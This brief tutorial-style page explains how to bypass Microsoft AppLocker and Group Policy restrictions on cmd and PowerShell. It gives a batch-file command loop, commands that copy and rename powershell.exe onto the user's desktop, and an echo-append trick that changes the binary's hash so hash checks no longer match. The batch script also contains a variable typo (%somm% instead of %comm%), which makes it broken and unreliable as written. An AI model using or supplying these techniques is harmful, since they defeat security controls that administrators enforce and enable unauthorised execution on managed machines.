Windows bypass CMD & PowerShell Restriction inforced by Microsoft App Locker AppLocker
The follow content saved to a file named
bypasscmd.bat
on the desktop of user on windows computer.
@echo off
:a
Set /p comm=cmd~
%somm%
Goto a
The following copy methods can be used to bypass if
powershell.exe
restrictions are enforced with Group Policy.
copy c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\users\peanut\desktop\powershell.exe
If above copy do not bypass restrictions, then rename the file to new name before running.
copy c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\users\peanut\desktop\NEW_powershell.exe
If the hash of the restricted file is checked then alter the hash of the `PowerShell.exe' using below method.
echo >>C:\users\peanut\desktop\powershell.exe
The techniques to perform Windows Bypass of restricted applications is explained in the video by Loi Liang Yang.